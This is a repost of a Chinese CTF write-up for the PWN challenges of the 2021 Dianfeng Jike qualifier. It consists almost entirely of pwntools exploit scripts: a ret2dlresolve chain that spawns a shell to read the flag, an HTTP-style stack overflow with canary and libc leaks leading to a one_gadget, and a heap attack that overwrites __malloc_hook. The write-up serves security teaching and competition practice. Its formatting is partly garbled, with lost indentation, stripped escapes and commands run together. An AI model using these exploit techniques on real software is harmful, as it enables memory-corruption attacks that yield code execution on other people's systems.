mimic-game
from pwn import *
context.log_level="debug"
context.terminal = ['tmux','sp','-h']
context.binary = elf = ELF('./mimic32')
context.arch = 'i386'
p = process("./mimic32")
# gdb.attach(p,"b *0x080489A7")
# pause()
rop = ROP(context.binary)
dlresolve = Ret2dlresolvePayload(elf,symbol="system",args=["/bin/sh -c 'cat flag'"])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
# print (rop.dump())
payload = flat({48:raw_rop,80:dlresolve.payload})
p.sendlineafter(">> ",str(1))
p.sendafter("> ",payload)
p.interactive() msgparser
memcpy 这里存在栈溢出,a1 是个栈地址,ptr 是 post 包的数据,len 是从 post 包 Content-Length 提取出来。
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']
p = process("./chall")
# gdb.attach(p,"b *0x555555555873")
# pause()
payload = '''POST /
Host: www.mrskye.com
Accept-Encoding: gzip
Content-Length: {}
Connection: close
{}'''
log.info("len:"+hex(len(payload)))
p.recvuntil("msg> ")
p.send(payload.format(8,'x01'))
p.recvuntil("msg> ")
p.send(payload.format(96,'x02'))
p.recv(8)
leak_addr = u64(p.recv(8))
log.info("leak_addr:"+hex(leak_addr))
libc_addr = leak_addr - (0x7ffff7dd5660-0x7ffff79e2000)
log.info("libc_addr:"+hex(libc_addr))
p.recv(0x48)
canary = u64(p.recv(8))
log.info("canary:"+hex(canary))
onegadget = libc_addr+0x10a41c
log.info("onegadget:"+hex(onegadget))
def getshell(len, text):
return ('POST / HTTP/1.1rnHost: hills.tonen.etrnContent-Length: %drnrn' % len) + text
p.recvuntil('msg> ')
payload = getshell(0x100,'x01'+ 'a' * 0x58 + p64((canary) + 1) + 'a' * 0x8 + p64(onegadget))
p.sendline(payload)
p.recvuntil('msg> ')
payload = getshell(89, 'x01' + 'a' * 0x58)
p.send(payload)
p.interactive() ghost
cd /lib64/sudo ln -s /home/zzq/shanshi/game/2021/dianfengjike/ghost/ld.so.2 ./15_ld_.so.2patchelf --set-interpreter /lib64/15_ld_.so.2 ./pwnpatchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
libc=ELF('libc.so.6')
#elf=ELF('npuctf_pwn')
#p = process(["./ld.so.2", "./pwn"],env={"LD_PRELOAD":"./libc.so.6"})
p=process('./pwn')
def add(id,size,data):
p.recvuntil('>>')
p.sendline('1')
p.recvuntil('idx:')
p.sendline(str(id))
p.recvuntil('len:')
p.sendline(str(size))
p.sendline(str(data))
def show(id):
p.recvuntil('>>')
p.sendline('2')
p.recvuntil('idx:')
p.sendline(str(id))
def delete(id):
p.recvuntil('>>')
p.sendline('3')
p.recvuntil('idx:')
p.sendline(str(id))
add(0,0x7,'10')
add(1,0x1790,'0')
add(2,0x67,'0'*0x3)
delete(0)
#add(0,0x17,'1')
add(3,0xbd8,'0'*0x1)
#add(0,0x27,'0')
add(3,0x408,'0'*0x1)
show(1)
p.recv(14)
leak=u64(p.recv(6).ljust(8,'x00'))
print hex(leak)
libcbase=leak-(0x7ffff7dd3de8-0x00007ffff7a12000)
print hex(libcbase)
#add(0,0x18,'0'*0x1)
delete(2)
add(3,0x308,'0'*0x1)
add(3,0x308,'0'*0x1)
malloc=libcbase+libc.sym['__malloc_hook']
payload='0'*0x258+p64(0x71)+p64(malloc-0x13)
add(3,0x308,payload)
one=libcbase+0xe66b5
add(2,0x67,'0'*0x3)
add(2,0x67,'000'+p64(one))
p.recvuntil('>>')
p.sendline('1')
p.recvuntil('idx:')
p.sendline(str(1))
p.recvuntil('len:')
p.sendline(str(7))
gdb.attach(p,'b *0x00555555554d3d')
raw_input()
p.interactive()
本文始发于微信公众号(山石网科安全技术研究院):2021巅峰极客线上初赛Writeup | PWN部分
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论